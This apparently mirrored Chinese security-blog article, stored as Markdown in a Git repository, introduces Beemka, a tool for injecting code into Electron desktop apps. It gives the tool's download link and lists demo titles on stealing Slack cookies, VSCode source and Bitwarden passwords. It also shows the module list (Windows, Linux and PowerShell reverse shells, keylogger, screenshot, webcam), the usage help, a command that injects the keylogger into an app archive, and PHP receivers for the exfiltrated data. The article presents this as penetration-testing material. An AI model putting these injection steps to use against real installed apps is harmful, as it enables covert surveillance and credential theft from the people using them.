admin/wxvl
1
0
Fork 0
mirror of https://github.com/gelusus/wxvl.git synced 2025-08-13 03:17:22 +00:00
Code Issues Packages Projects Releases Wiki Activity
wxvl/doc/2024-10/针对 Electron App 的漏洞利用工具.md

264 lines
10 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 针对 Electron App 的漏洞利用工具
Urkc安全 2024-10-06 18:00
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQm8jgLG6cJ9kzyfibwaonj9C7b6Qm5aiarjjklbgeQTVMstPBJmtuNhFg/640?wx_fmt=gif&from=appmsg "")
**BEEMKA针对 Electron App 的漏洞利用工具**
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbic2Kv3nLL7U86P6OSF4XDnKRjcdKaic50k6cw2y37OAic9bia4OErhKIQ/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
**项目介绍**
    Beemka 是一个用于 Electron 应用程序的基本利用工具。它允许用户注入代码到 Electron 应用中,并提供了多种模块来执行不同的操作,如反向 shell、截图、键盘记录等。该项目旨在帮助安全研究人员和开发者理解和测试 Electron 应用的安全性。
**工具下载url**
https://codeload.github.com/ctxis/beemka/zip/refs/heads/master
**PART.****1**
**BSidesLV Slack Cookie 出口演示**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQCx6d92Yh0jrTrRPBJ5n1liak37jLRpnwchzTlzVPrhlSfkgc4BMXjWQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQRenTn5T9aUvj1ibo2etnOjKErq62b4zGmwxZaqtkxRceuzNXhDNMdLw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ8oQbvwJicRpJfyBrVd684Yq3AeqbJTD9UuB49LK49sibe9Uj76wt1Cibg/640?wx_fmt=png&from=appmsg "")
**拿到b、x、d以及对应值去登录**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ2Vq7RqKWbMkXCOLbOpdgtbVvhogyd6xicibIJrSIBFddwCCSu6aBq2iag/640?wx_fmt=png&from=appmsg "")
**刷新进入**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQVkebQM8HEc8XQjLx5v8HD2nNSYicS0Nu7AMvd5ny4I6h3kwHBYDjYOg/640?wx_fmt=png&from=appmsg "")
可参考视频
https://www.youtube.com/watch?v=hRX7kT2r7LA
**PART.****2**
**BSidesLV VSCode 源码出口演示**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQVHnOAdF7gxOnbVntloABAxlWd2sfpghbpSCcBicXEibdDTX0R7Bxsl0Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQzkkVtLlGg2Bfjk97xic1PXH1KU5cvia263NWVHrHKJjtRP7tjOpZgteA/640?wx_fmt=png&from=appmsg "")
可参考视频
https://www.youtube.com/watch?v=pKWX3nelszQ
**PART.****3**
**Bitwarden 密码出口**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ5waJ0sCgkKFhvgWNvw1ETxzcg9YL4s1via2CMklkCRZCmOPE6xKqzdA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQC9uzQjTrsHMo1ufGgaCmzefoDx5sw2ibaOaicgIbhkkbEFy41tOlQ1Ow/640?wx_fmt=png&from=appmsg "")
**PART.4**
**Skype 反向 Shell**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQnBicyKwbGaUjYicYfrpZ4vqXJR5LYKcr2M3JmnKY4PMph9yQRJSUDLlA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQQJ8uDJln9gXSqGdl30saECSyPyAkuuzNoq81vWfuaqleqiaYcibicegcw/640?wx_fmt=png&from=appmsg "")
**PART.5**
**Slack 桌面屏幕截图**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQ9hKHGvwF0ozrX6TQ8mXCiabJiaJBLrcfia4CMeLbnZwAdTxjsRKslQS6Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQYEpKFcEfbVDSoF8vYrlaK6WOQqNxdGPldgY2xSaiadgqQVHdHicR1NiaA/640?wx_fmt=png&from=appmsg "")
**PART.6**
**VS Code 网络摄像头**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQDdhib42iaLlUQGnTqsUJiaVv3NO0rMtTUHEPFcvfGMleNwAcaFYZWVZsQ/640?wx_fmt=png&from=appmsg "")
###
**PART.7**
**要求**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
###
- Python 3.5+ 
- JSMIN 
**PART.8**
**”安装+使用“指南**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
**安装**
```
pip3 install -r requirements.txt
```
**模块**
```
python3 beemka.py --list
Available modules
[ rshell_cmd ]          Windows Reverse Shell
[ rshell_linux ]        Linux Reverse Shell
[ screenshot ]          Screenshot Module
[ rshell_powershell ]   PowerShell Reverse Shell
[ keylogger ]           Keylogger Module
[ webcamera ]           WebCamera Module
```
**特点**
```
usage: Beemka Electron Exploitation [-h] [-v] [-l] [-i] [-f ASAR_FILE]
                                   [-p ASAR_WORKING_PATH] [-o OUTPUT_FILE]
                                   [-m MODULE] [-u] [-z]
optional arguments:
 -h, --help            show this help message and exit
 -v, --version         show program's version number and exit
 -l, --list-modules    List all available modules.
 -i, --inject          Inject code into Electron.
 -f ASAR_FILE, --asar ASAR_FILE
                       Path to electron.asar file.
 -p ASAR_WORKING_PATH, --asar-working-path ASAR_WORKING_PATH
                       Temporary working path to use for extracting asar
                       archives.
 -o OUTPUT_FILE, --output OUTPUT_FILE
                       Path to the file that will be generated.
 -m MODULE, --module MODULE
                       Module to inject. Use --list-modules to list available
                       modules.
 -u, --unpack          Unpack asar file.
 -z, --pack            Pack asar file.
```
**将模块注入应用程序:**
```
python3 beemka.py --inject --module keylogger --asar "PATH_TO_ELECTRON.ASAR" --output "SAVE_AS_ASAR"
```
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
Beemka 项目没有明确的配置文件,但可以通过命令行参数进行配置。例如,可以通过 --asar 参数指定 Electron 的 ASAR 文件路径,通过 --module 参数指定要注入的模块等。
eg
```
# 示例命令
python3 beemka.py --asar /path/to/asar/file --module rshell_cmd
```
### 外泄帮手
![](https://mmbiz.qpic.cn/mmbiz_gif/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQR5hovFqia25swxDXHia8uGCU5qbUdUwPt2G7ZBFto7iblhgMjCJqJ8ibbA/640?wx_fmt=gif&from=appmsg "")
在 ./server 目录下有以下文件:
**1. text.php**
此文件可用于接收 keylogger 模块发送的数据。
使用前,请确保更新文件开头的 “$storage” 参数。
**2. image.php**
此文件可用于接收 webcamera 和 screenshot 模块发送的数据。
使用前,请确保更新文件开头的 “$storage” 参数。
**PART.9**
**总结**
![](https://mmbiz.qpic.cn/mmbiz_png/FL9Xqxpicm6oFTLANwhfWRe7OQS0UGOvQbA01GvQnm4vdzczf7WA0x89BWCfHFngB2X3eMWoDJCWOmHuyh4gn1Q/640?wx_fmt=png&from=appmsg "")
**应用案例**
    安全测试Beemka 可以用于测试 Electron 应用的安全性,通过注入恶意代码来检查应用的响应和防御机制。
渗透测试:渗透测试人员可以使用 Beemka 来模拟攻击,评估系统的安全性。
**最佳实践**
    定期更新:确保使用最新版本的 Beemka 和 Electron 应用,以避免已知的安全漏洞。
    权限控制:在测试环境中使用 Beemka 时,确保有适当的权限控制,避免对生产环境造成影响。
**典型生态项目**
    ElectronBeemka 主要针对 Electron 应用进行操作Electron 是一个使用 JavaScript、HTML 和 CSS 构建跨平台桌面应用的框架。
    Node.jsBeemka 依赖于 Node.js 环境Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时。
Reference in New Issue View Git Blame Copy Permalink